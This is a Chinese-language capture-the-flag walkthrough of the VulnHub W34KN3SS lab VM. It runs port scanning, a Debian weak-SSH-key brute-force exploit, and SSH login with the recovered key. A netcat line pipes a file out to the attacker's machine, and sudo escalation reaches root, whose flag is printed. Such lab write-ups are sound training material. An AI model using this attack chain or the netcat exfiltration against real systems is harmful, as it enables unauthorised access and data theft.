vulnhub-w34kn3ss-类oscp

由 admin 发布

vulnhub-w34kn3ss

类oscp系列靶机

Bob 1.0.1: https://www.vulnhub.com/entry/bob-101,226/
通过
https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview
获取

Date: 07/08/2022
Difficulty: Easy
Tags: sudo -l

信息搜集

端口扫描

➜  bypassav nmap -p- 192.168.31.178 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-08 06:12 EDT
Nmap scan report for 192.168.31.178
Host is up (0.00030s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)
|   256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)
|_  256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo
| Not valid before: 2018-05-05T11:12:54
|_Not valid after:  2019-05-05T11:12:54
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds

开放 22 80 443

从 443 端口中信息得到需要添加 hosts

ip weakness.jth

主页

Untitled

目录扫描

[04:19:48] 200 -  526B  - /index.html                                       
[04:19:58] 301 -  314B  - /private  ->  http://weakness.jth/private/        
[04:20:00] 200 -   14B  - /robots.txt

根据扫描结果

打开 http://weakness.jth/private/ 得到两个文件

内容为

notes.txt

this key was generated by openssl 0.9.8c-1

以及 mykey.pub

漏洞利用

➜  W34KN3SS searchsploit  openssl 0.9.8c-1
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH              | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH              | linux/remote/5720.py
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)       | linux/remote/5632.rb
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

在 5622.txt 中得到利用步骤如下

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
            https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 
Bits, generated on an upatched debian (this is the key this exploit will 
break)

4. Run the perl script and give it the location to where you extracted 
the bzip2 mentioned.

漏洞成因
大概是 在特殊的版本只能生成这么多公钥只要与 mykey.pub 相同的内容就能找到

下载文件解压

➜  W34KN3SS cd rsa 
➜  rsa cat ../mykey.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster
➜  rsa grep -R "Do0qVzzxsnTxB5JAfF7ifoDZp2yczZg"
2048/4161de56829de2fe64b9055711f531c1-2537.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster

此时已经找到与 mykey.pub 相同的文件

初始访问

n30

➜  rsa ssh  -i ./2048/4161de56829de2fe64b9055711f531c1-2537  n30@192.168.31.178
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

New release '20.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Jul  8 14:46:02 2022 from 192.168.31.134
n30@W34KN3SS:~$ whoami
n30

在用户家目录得到这样的文件

n30@W34KN3SS:~$ pwd
/home/n30
n30@W34KN3SS:~$ ls -al
total 44
drwxr-xr-x 5 n30  n30  4096 Aug 14  2018 .
drwxr-xr-x 3 root root 4096 May  5  2018 ..
-rw------- 1 n30  n30  1215 Jul  9 11:03 .bash_history
-rw-r--r-- 1 n30  n30   220 May  5  2018 .bash_logout
-rw-r--r-- 1 n30  n30  3771 May  5  2018 .bashrc
drwx------ 2 n30  n30  4096 May  5  2018 .cache
-rwxrwxr-x 1 n30  n30  1138 May  8  2018 code
drwxrwxr-x 3 n30  n30  4096 May  5  2018 .local
-rw-r--r-- 1 n30  n30   818 May  7  2018 .profile
drwxrwxr-x 2 n30  n30  4096 May  5  2018 .ssh
-rw-r--r-- 1 n30  n30     0 May  5  2018 .sudo_as_admin_successful
-rw-rw-r-- 1 n30  n30    33 May  8  2018 user.txt

将文件传输至 kali

kali

➜  W34KN3SS nc -lvp 1234 > code
listening on [any] 1234 ...
connect to [192.168.31.134] from weakness.jth [192.168.31.178] 53978
^C
➜  W34KN3SS file code 
code: python 2.7 byte-compiled

靶机

n30@W34KN3SS:~$ which nc
/bin/nc
n30@W34KN3SS:~$ cat code | nc 192.168.31.134 1234

得到文件后,上传至在线反编译得到 源码

Untitled

inf 结果打印得到用户密码

ROOT

n30@W34KN3SS:~$ sudo -l
[sudo] password for n30: 
Matching Defaults entries for n30 on W34KN3SS:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User n30 may run the following commands on W34KN3SS:
    (ALL : ALL) ALL
n30@W34KN3SS:~$ sudo su
root@W34KN3SS:/home/n30# cat /root/root.txt 
a1d2fab76ec6af9b651d4053171e042e
root@W34KN3SS:/home/n30#

暂无评论

发表评论